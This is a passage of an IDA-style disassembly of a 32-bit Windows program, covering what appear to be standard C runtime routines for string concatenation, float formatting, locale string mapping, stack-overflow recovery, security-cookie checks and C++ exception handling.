mov edi, [ebp+arg_4]
mov eax, ebx
call sub_419886
push edi
push 30h
push ebx
call sub_41C550
add esp, 0Ch
loc_419A59: ; CODE XREF: sub_4199C5+56�j
; sub_4199C5+6C�j
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4199C5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419A61 proc near ; CODE XREF: sub_419B69+1E�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DD74
mov esi, [ebp+arg_8]
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+var_10]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_41DC43
push 0
push esi
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_4199C5
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
mov eax, [ebp+arg_4]
add esp, 28h
pop esi
call sub_41A1F6
leave
retn
sub_419A61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419AC9 proc near ; CODE XREF: sub_419B69+34�p
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
push edi
lea eax, [ebp+var_2C]
push eax
lea eax, [ebp+var_14]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+4]
push dword ptr [eax]
call sub_41DD74
mov esi, [ebp+var_10]
mov ebx, [ebp+arg_8]
xor eax, eax
dec esi
cmp [ebp+var_14], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_14]
push eax
push ebx
push edi
call sub_41DC43
mov eax, [ebp+var_10]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_419B45
cmp eax, ebx
jge short loc_419B45
test cl, cl
jz short loc_419B35
loc_419B2B: ; CODE XREF: sub_419AC9+67�j
mov al, [edi]
inc edi
test al, al
jnz short loc_419B2B
and [edi-2], al
loc_419B35: ; CODE XREF: sub_419AC9+60�j
push 1
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_14]
call sub_4199C5
jmp short loc_419B56
; ---------------------------------------------------------------------------
loc_419B45: ; CODE XREF: sub_419AC9+58�j
; sub_419AC9+5C�j
push 1
push [ebp+arg_C]
lea eax, [ebp+var_14]
push ebx
mov ebx, [ebp+arg_4]
call sub_4198A3
loc_419B56: ; CODE XREF: sub_419AC9+7A�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
add esp, 0Ch
pop edi
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_419AC9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419B69 proc near ; DATA XREF: sub_414EC5�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_419BA4
cmp [ebp+arg_8], 45h
jz short loc_419BA4
cmp [ebp+arg_8], 66h
jnz short loc_419B91
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419A61
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_419B91: ; CODE XREF: sub_419B69+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419AC9
jmp short loc_419BB5
; ---------------------------------------------------------------------------
loc_419BA4: ; CODE XREF: sub_419B69+7�j
; sub_419B69+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_419951
loc_419BB5: ; CODE XREF: sub_419B69+39�j
add esp, 10h
pop ebp
retn
sub_419B69 endp
; =============== S U B R O U T I N E =======================================
sub_419BBA proc near ; CODE XREF: sub_414EFD+F�p
push 30000h
push 10000h
call sub_41DF41
pop ecx
pop ecx
retn
sub_419BBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419BCC proc near ; CODE XREF: sub_419C0C:loc_419C30�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_429080
fstp [ebp+var_8]
fld ds:dbl_429078
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_429070
fnstsw ax
test ah, 41h
jnz short loc_419C08
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_419C08: ; CODE XREF: sub_419BCC+35�j
xor eax, eax
leave
retn
sub_419BCC endp
; =============== S U B R O U T I N E =======================================
sub_419C0C proc near ; CODE XREF: sub_414EFD+5�p
push offset aKernel32 ; "KERNEL32"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
jz short loc_419C30
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:dword_420084 ; GetProcAddress
test eax, eax
jz short loc_419C30
push 0
call eax
retn
; ---------------------------------------------------------------------------
loc_419C30: ; CODE XREF: sub_419C0C+D�j
; sub_419C0C+1D�j
jmp sub_419BCC
sub_419C0C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419C40 proc near ; CODE XREF: sub_415136+F5�p
; sub_4198A3+60�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_419CB5
sub_419C40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419C50 proc near ; CODE XREF: sub_41B5C9+10B�p
; sub_41B5C9+116�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_419C70
loc_419C5D: ; CODE XREF: sub_419C50+1C�j
mov al, [ecx]
add ecx, 1
test al, al
jz short loc_419CA3
test ecx, 3
jnz short loc_419C5D
mov edi, edi
loc_419C70: ; CODE XREF: sub_419C50+B�j
; sub_419C50+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_419C70
mov eax, [ecx-4]
test al, al
jz short loc_419CB2
test ah, ah
jz short loc_419CAD
test eax, 0FF0000h
jz short loc_419CA8
test eax, 0FF000000h
jz short loc_419CA3
jmp short loc_419C70
; ---------------------------------------------------------------------------
loc_419CA3: ; CODE XREF: sub_419C50+14�j
; sub_419C50+4F�j
lea edi, [ecx-1]
jmp short loc_419CB5
; ---------------------------------------------------------------------------
loc_419CA8: ; CODE XREF: sub_419C50+48�j
lea edi, [ecx-2]
jmp short loc_419CB5
; ---------------------------------------------------------------------------
loc_419CAD: ; CODE XREF: sub_419C50+41�j
lea edi, [ecx-3]
jmp short loc_419CB5
; ---------------------------------------------------------------------------
loc_419CB2: ; CODE XREF: sub_419C50+3D�j
lea edi, [ecx-4]
loc_419CB5: ; CODE XREF: sub_419C40+5�j
; sub_419C50+56�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_419CDE
loc_419CC1: ; CODE XREF: sub_419C50+85�j
mov dl, [ecx]
add ecx, 1
test dl, dl
jz short loc_419D30
mov [edi], dl
add edi, 1
test ecx, 3
jnz short loc_419CC1
jmp short loc_419CDE
; ---------------------------------------------------------------------------
loc_419CD9: ; CODE XREF: sub_419C50+A6�j
; sub_419C50+C0�j
mov [edi], edx
add edi, 4
loc_419CDE: ; CODE XREF: sub_419C50+6F�j
; sub_419C50+87�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_419CD9
test dl, dl
jz short loc_419D30
test dh, dh
jz short loc_419D27
test edx, 0FF0000h
jz short loc_419D1A
test edx, 0FF000000h
jz short loc_419D12
jmp short loc_419CD9
; ---------------------------------------------------------------------------
loc_419D12: ; CODE XREF: sub_419C50+BE�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419D1A: ; CODE XREF: sub_419C50+B6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_419D27: ; CODE XREF: sub_419C50+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419D30: ; CODE XREF: sub_419C50+78�j
; sub_419C50+AA�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_419C50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419D38 proc near ; CODE XREF: sub_415136+A5�p
; sub_416F0B+4DC�p ...
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_F = byte ptr -0Fh
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 4
pop eax
call sub_414800
mov ebx, esp
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_42019C ; VirtualQuery
test eax, eax
jz short loc_419DCD
mov edi, [ebp+var_20]
lea eax, [ebp+var_48]
push eax
call ds:dword_420074 ; GetSystemInfo
mov eax, [ebp+var_44]
lea esi, [eax-1]
not esi
and esi, ebx
sub esi, eax
mov [ebp+var_4], eax
mov eax, dword_47C1A4
mov ecx, eax
dec ecx
neg ecx
sbb ecx, ecx
and ecx, 0FFFF1000h
add ecx, 11000h
add ecx, edi
cmp esi, ecx
jb short loc_419DCD
cmp eax, 1
jz short loc_419DE5
mov ebx, edi
mov edi, 1000h
loc_419DA2: ; CODE XREF: sub_419D38+81�j
push 1Ch
lea eax, [ebp+var_24]
push eax
push ebx
call ds:dword_42019C ; VirtualQuery
test eax, eax
jz short loc_419DCD
add ebx, [ebp+var_18]
test [ebp+var_14], edi
jz short loc_419DA2
test [ebp+var_F], 1
mov ebx, [ebp+var_24]
jz short loc_419DC9
xor eax, eax
inc eax
jmp short loc_419E01
; ---------------------------------------------------------------------------
loc_419DC9: ; CODE XREF: sub_419D38+8A�j
cmp esi, ebx
jnb short loc_419DD1
loc_419DCD: ; CODE XREF: sub_419D38+22�j
; sub_419D38+5C�j ...
xor eax, eax
jmp short loc_419E01
; ---------------------------------------------------------------------------
loc_419DD1: ; CODE XREF: sub_419D38+93�j
push 4
push edi
push [ebp+var_4]
push ebx
call ds:dword_420190 ; VirtualAlloc
mov eax, dword_47C1A4
jmp short loc_419DE7
; ---------------------------------------------------------------------------
loc_419DE5: ; CODE XREF: sub_419D38+61�j
mov ebx, esi
loc_419DE7: ; CODE XREF: sub_419D38+AB�j
dec eax
neg eax
sbb eax, eax
and eax, 103h
lea ecx, [ebp+var_8]
push ecx
inc eax
push eax
push [ebp+var_4]
push ebx
call ds:dword_420198 ; VirtualProtect
loc_419E01: ; CODE XREF: sub_419D38+8F�j
; sub_419D38+97�j
lea esp, [ebp-54h]
pop edi
pop esi
pop ebx
leave
retn
sub_419D38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419E09 proc near ; CODE XREF: sub_415136+6F�p
; sub_415136+E5�p ...
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push 38h
push offset stru_4290B8
call __SEH_prolog
xor ebx, ebx
cmp dword_47C360, ebx
jnz short loc_419E57
push ebx
push ebx
xor esi, esi
inc esi
push esi
push offset dword_4290B0
push 100h
push ebx
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_419E42
mov dword_47C360, esi
jmp short loc_419E57
; ---------------------------------------------------------------------------
loc_419E42: ; CODE XREF: sub_419E09+2F�j
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_419E57
mov dword_47C360, 2
loc_419E57: ; CODE XREF: sub_419E09+14�j
; sub_419E09+37�j ...
cmp [ebp+arg_C], ebx
jle short loc_419E77
mov ecx, [ebp+arg_C]
mov eax, [ebp+arg_8]
loc_419E62: ; CODE XREF: sub_419E09+61�j
dec ecx
cmp [eax], bl
jz short loc_419E6F
inc eax
cmp ecx, ebx
jnz short loc_419E62
or ecx, 0FFFFFFFFh
loc_419E6F: ; CODE XREF: sub_419E09+5C�j
or eax, 0FFFFFFFFh
sub eax, ecx
add [ebp+arg_C], eax
loc_419E77: ; CODE XREF: sub_419E09+51�j
mov eax, dword_47C360
cmp eax, 2
jz loc_41A061
cmp eax, ebx
jz loc_41A061
cmp eax, 1
jnz loc_41A094
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_20], ebx
mov [ebp+var_24], ebx
cmp [ebp+arg_18], ebx
jnz short loc_419EAE
mov eax, dword_47C4D0
mov [ebp+arg_18], eax
loc_419EAE: ; CODE XREF: sub_419E09+9B�j
push ebx
push ebx
push [ebp+arg_C]
push [ebp+arg_8]
xor eax, eax
cmp [ebp+arg_1C], ebx
setnz al
lea eax, ds:1[eax*8]
push eax
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_28], esi
cmp esi, ebx
jz loc_41A094
mov [ebp+ms_exc.disabled], 1
lea eax, [esi+esi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_2C], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419F1A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
mov [ebp+var_2C], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_419F1A: ; CODE XREF: sub_419E09+F4�j
cmp [ebp+var_2C], ebx
jnz short loc_419F3B
lea eax, [esi+esi]
push eax
call sub_414E7D
pop ecx
mov [ebp+var_2C], eax
cmp eax, ebx
jz loc_41A094
mov [ebp+var_20], 1
loc_419F3B: ; CODE XREF: sub_419E09+114�j
push esi
push [ebp+var_2C]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call ds:dword_4200D4 ; MultiByteToWideChar
test eax, eax
jz loc_41A03E
push ebx
push ebx
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
mov edi, eax
mov [ebp+var_1C], edi
cmp edi, ebx
jz loc_41A03E
test byte ptr [ebp+arg_4+1], 4
jz short loc_419FAA
cmp [ebp+arg_14], ebx
jz loc_41A03E
cmp edi, [ebp+arg_14]
jg loc_41A03E
push [ebp+arg_14]
push [ebp+arg_10]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
jmp loc_41A03E
; ---------------------------------------------------------------------------
loc_419FAA: ; CODE XREF: sub_419E09+172�j
mov [ebp+ms_exc.disabled], 2
lea eax, [edi+edi]
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov eax, esp
mov [ebp+var_30], eax
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_419FE8
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
mov [ebp+var_30], ebx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov edi, [ebp+var_1C]
mov esi, [ebp+var_28]
loc_419FE8: ; CODE XREF: sub_419E09+1C2�j
cmp [ebp+var_30], ebx
jnz short loc_41A005
lea eax, [edi+edi]
push eax
call sub_414E7D
pop ecx
mov [ebp+var_30], eax
cmp eax, ebx
jz short loc_41A03E
mov [ebp+var_24], 1
loc_41A005: ; CODE XREF: sub_419E09+1E2�j
push edi
push [ebp+var_30]
push esi
push [ebp+var_2C]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A4 ; LCMapStringW
test eax, eax
jz short loc_41A03E
push ebx
push ebx
cmp [ebp+arg_14], ebx
jnz short loc_41A028
push ebx
push ebx
jmp short loc_41A02E
; ---------------------------------------------------------------------------
loc_41A028: ; CODE XREF: sub_419E09+219�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_41A02E: ; CODE XREF: sub_419E09+21D�j
push edi
push [ebp+var_30]
push ebx
push [ebp+arg_18]
call ds:dword_4200D8 ; WideCharToMultiByte
mov edi, eax
loc_41A03E: ; CODE XREF: sub_419E09+149�j
; sub_419E09+168�j ...
cmp [ebp+var_24], ebx
jz short loc_41A04C
push [ebp+var_30]
call sub_414A14
pop ecx
loc_41A04C: ; CODE XREF: sub_419E09+238�j
cmp [ebp+var_20], ebx
jz short loc_41A05A
push [ebp+var_2C]
call sub_414A14
pop ecx
loc_41A05A: ; CODE XREF: sub_419E09+246�j
mov eax, edi
jmp loc_41A1BC
; ---------------------------------------------------------------------------
loc_41A061: ; CODE XREF: sub_419E09+76�j
; sub_419E09+7E�j
mov [ebp+var_34], ebx
xor edi, edi
mov [ebp+var_38], ebx
cmp [ebp+arg_0], ebx
jnz short loc_41A076
mov eax, dword_47C4C0
mov [ebp+arg_0], eax
loc_41A076: ; CODE XREF: sub_419E09+263�j
cmp [ebp+arg_18], ebx
jnz short loc_41A083
mov eax, dword_47C4D0
mov [ebp+arg_18], eax
loc_41A083: ; CODE XREF: sub_419E09+270�j
push [ebp+arg_0]
call sub_41DF57
pop ecx
mov [ebp+var_3C], eax
cmp eax, 0FFFFFFFFh
jnz short loc_41A09B
loc_41A094: ; CODE XREF: sub_419E09+87�j
; sub_419E09+CD�j ...
xor eax, eax
jmp loc_41A1BC
; ---------------------------------------------------------------------------
loc_41A09B: ; CODE XREF: sub_419E09+289�j
cmp eax, [ebp+arg_18]
jz loc_41A192
push ebx
push ebx
lea ecx, [ebp+arg_C]
push ecx
push [ebp+arg_8]
push eax
push [ebp+arg_18]
call sub_41DFA0
add esp, 18h
mov [ebp+var_34], eax
cmp eax, ebx
jz short loc_41A094
push ebx
push ebx
push [ebp+arg_C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
mov [ebp+var_40], esi
cmp esi, ebx
jz loc_41A181
mov [ebp+ms_exc.disabled], ebx
add eax, 3
and eax, 0FFFFFFFCh
call sub_414800
mov [ebp+ms_exc.old_esp], esp
mov edi, esp
mov [ebp+var_44], edi
push esi
push ebx
push edi
call sub_41C550
add esp, 0Ch
jmp short loc_41A112
; ---------------------------------------------------------------------------
loc_41A102: ; DATA XREF: .rdata:stru_4290B8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41A106: ; DATA XREF: .rdata:stru_4290B8�o
mov esp, [ebp+ms_exc.old_esp]
call sub_419D38
xor ebx, ebx
xor edi, edi
loc_41A112: ; CODE XREF: sub_419E09+2F7�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
cmp edi, ebx
jnz short loc_41A13D
push [ebp+var_40]
call sub_414E7D
pop ecx
mov edi, eax
cmp edi, ebx
jz short loc_41A15A
push [ebp+var_40]
push ebx
push edi
call sub_41C550
add esp, 0Ch
mov [ebp+var_38], 1
loc_41A13D: ; CODE XREF: sub_419E09+30F�j
push [ebp+var_40]
push edi
push [ebp+arg_C]
push [ebp+var_34]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov [ebp+var_40], eax
cmp eax, ebx
jnz short loc_41A15E
loc_41A15A: ; CODE XREF: sub_419E09+31E�j
xor esi, esi
jmp short loc_41A184
; ---------------------------------------------------------------------------
loc_41A15E: ; CODE XREF: sub_419E09+34F�j
push [ebp+arg_14]
push [ebp+arg_10]
lea eax, [ebp+var_40]
push eax
push edi
push [ebp+arg_18]
push [ebp+var_3C]
call sub_41DFA0
add esp, 18h
mov esi, eax
neg esi
sbb esi, esi
neg esi
jmp short loc_41A184
; ---------------------------------------------------------------------------
loc_41A181: ; CODE XREF: sub_419E09+2D0�j
mov esi, [ebp+var_48]
loc_41A184: ; CODE XREF: sub_419E09+353�j
; sub_419E09+376�j
cmp [ebp+var_38], ebx
jz short loc_41A1AC
push edi
call sub_414A14
pop ecx
jmp short loc_41A1AC
; ---------------------------------------------------------------------------
loc_41A192: ; CODE XREF: sub_419E09+295�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4201A0 ; LCMapStringA
mov esi, eax
loc_41A1AC: ; CODE XREF: sub_419E09+37E�j
; sub_419E09+387�j
cmp [ebp+var_34], ebx
jz short loc_41A1BA
push [ebp+var_34]
call sub_414A14
pop ecx
loc_41A1BA: ; CODE XREF: sub_419E09+3A6�j
mov eax, esi
loc_41A1BC: ; CODE XREF: sub_419E09+253�j
; sub_419E09+28D�j
lea esp, [ebp-54h]
call __SEH_epilog
retn
sub_419E09 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41A1F6
loc_41A1C5: ; CODE XREF: sub_41A1F6:loc_41A1FF�j
push 8
push offset stru_4294F0
call __SEH_prolog
and dword ptr [ebp-4], 0
push 0
push 1
call sub_41E1C5
pop ecx
pop ecx
jmp short loc_41A1E9
; END OF FUNCTION CHUNK FOR sub_41A1F6
; =============== S U B R O U T I N E =======================================
sub_41A1E2 proc near ; DATA XREF: .rdata:stru_4294F0�o
xor eax, eax
inc eax
retn
sub_41A1E2 endp
; ---------------------------------------------------------------------------
loc_41A1E6: ; DATA XREF: .rdata:stru_4294F0�o
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_41A1F6
loc_41A1E9: ; CODE XREF: sub_41A1F6-16�j
or dword ptr [ebp-4], 0FFFFFFFFh
push 3
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
; END OF FUNCTION CHUNK FOR sub_41A1F6
; =============== S U B R O U T I N E =======================================
sub_41A1F6 proc near ; CODE XREF: sub_415459+B4�p
; sub_416662+76E�p ...
; FUNCTION CHUNK AT 0041A1C5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0041A1E9 SIZE 0000000D BYTES
cmp ecx, dword_42DEA8
jnz short loc_41A1FF
retn
; ---------------------------------------------------------------------------
loc_41A1FF: ; CODE XREF: sub_41A1F6+6�j
jmp loc_41A1C5
sub_41A1F6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A204 proc near ; CODE XREF: sub_41A7EB+138�p
arg_0 = dword ptr 4
mov eax, [esi+4]
test eax, eax
jz short loc_41A24F
lea edx, [eax+8]
cmp byte ptr [edx], 0
jz short loc_41A24F
mov ecx, [edi+4]
cmp eax, ecx
jz short loc_41A22A
add ecx, 8
push ecx
push edx
call sub_41CA90
test eax, eax
pop ecx
pop ecx
jnz short loc_41A24C
loc_41A22A: ; CODE XREF: sub_41A204+14�j
test byte ptr [edi], 2
jz short loc_41A234
test byte ptr [esi], 8
jz short loc_41A24C
loc_41A234: ; CODE XREF: sub_41A204+29�j
mov eax, [esp+arg_0]
mov eax, [eax]
test al, 1
jz short loc_41A243
test byte ptr [esi], 1
jz short loc_41A24C
loc_41A243: ; CODE XREF: sub_41A204+38�j
test al, 2
jz short loc_41A24F
test byte ptr [esi], 2
jnz short loc_41A24F
loc_41A24C: ; CODE XREF: sub_41A204+24�j
; sub_41A204+2E�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A24F: ; CODE XREF: sub_41A204+5�j
; sub_41A204+D�j ...
xor eax, eax
inc eax
retn
sub_41A204 endp
; =============== S U B R O U T I N E =======================================
sub_41A253 proc near ; CODE XREF: sub_41A271+76�p
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_41A260
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41A260: ; CODE XREF: sub_41A253+8�j
call sub_416E15
and dword ptr [eax+80h], 0
jmp sub_41AA6F
sub_41A253 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A271 proc near ; CODE XREF: sub_41A3A1+117�p
; sub_41A6C4+31�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 10h
push offset stru_429500
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
call sub_416E15
add eax, 80h
inc dword ptr [eax]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
loc_41A299: ; CODE XREF: sub_41A271+8F�j
cmp esi, [ebp+arg_C]
jz short loc_41A302
cmp esi, 0FFFFFFFFh
jle short loc_41A2A8
cmp esi, [edi+4]
jl short loc_41A2AD
loc_41A2A8: ; CODE XREF: sub_41A271+30�j
call sub_41AAA4
loc_41A2AD: ; CODE XREF: sub_41A271+35�j
mov eax, esi
shl eax, 3
mov ecx, [edi+8]
add ecx, eax
mov esi, [ecx]
mov [ebp+var_20], esi
mov [ebp+ms_exc.disabled], 1
cmp dword ptr [ecx+4], 0
jz short loc_41A2DE
mov [ebx+8], esi
push 103h
push ebx
mov ecx, [edi+8]
push dword ptr [ecx+eax+4]
call sub_41AAE0
loc_41A2DE: ; CODE XREF: sub_41A271+56�j
and [ebp+ms_exc.disabled], 0
jmp short loc_41A2FD
; ---------------------------------------------------------------------------
loc_41A2E4: ; DATA XREF: .rdata:00429510�o
mov eax, [ebp+ms_exc.exc_ptr]
call sub_41A253
retn
; ---------------------------------------------------------------------------
loc_41A2ED: ; DATA XREF: .rdata:00429514�o
mov esp, [ebp+ms_exc.old_esp]
and [ebp+ms_exc.disabled], 0
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_20]
loc_41A2FD: ; CODE XREF: sub_41A271+71�j
mov [ebp+var_1C], esi
jmp short loc_41A299
; ---------------------------------------------------------------------------
loc_41A302: ; CODE XREF: sub_41A271+2B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41A324
cmp esi, [ebp+arg_C]
jz short loc_41A315
call sub_41AAA4
loc_41A315: ; CODE XREF: sub_41A271+9D�j
mov [ebx+8], esi
call __SEH_epilog
retn
sub_41A271 endp
; =============== S U B R O U T I N E =======================================
sub_41A31E proc near ; DATA XREF: .rdata:stru_429500�o
mov ebx, [ebp+8]
mov esi, [ebp-1Ch]
sub_41A31E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41A324 proc near ; CODE XREF: sub_41A271+95�p
call sub_416E15
cmp dword ptr [eax+80h], 0
jle short locret_41A33E
call sub_416E15
add eax, 80h
dec dword ptr [eax]
locret_41A33E: ; CODE XREF: sub_41A324+C�j
retn
sub_41A324 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A33F proc near ; CODE XREF: sub_41A4E4+5C�p
; sub_41A7EB+1A8�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_429518
call __SEH_prolog
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_41A36D
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_41A36D
and [ebp+ms_exc.disabled], 0
push ecx
push dword ptr [eax+18h]
call sub_41563C
or [ebp+ms_exc.disabled], 0FFFFFFFFh
loc_41A36D: ; CODE XREF: sub_41A33F+11�j
; sub_41A33F+1B�j
call __SEH_epilog
retn
sub_41A33F endp
; =============== S U B R O U T I N E =======================================
sub_41A373 proc near ; DATA XREF: .rdata:stru_429518�o
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
sub_41A373 endp
; ---------------------------------------------------------------------------
loc_41A37C: ; DATA XREF: .rdata:stru_429518�o
mov esp, [ebp-18h]
jmp sub_41AA6F
; =============== S U B R O U T I N E =======================================
sub_41A384 proc near ; CODE XREF: sub_41A548+7C�p
; sub_41A548+FB�p ...
mov edx, [ecx+4]
push esi
mov esi, eax
mov eax, [ecx]
add eax, esi
test edx, edx
jl short loc_41A39F
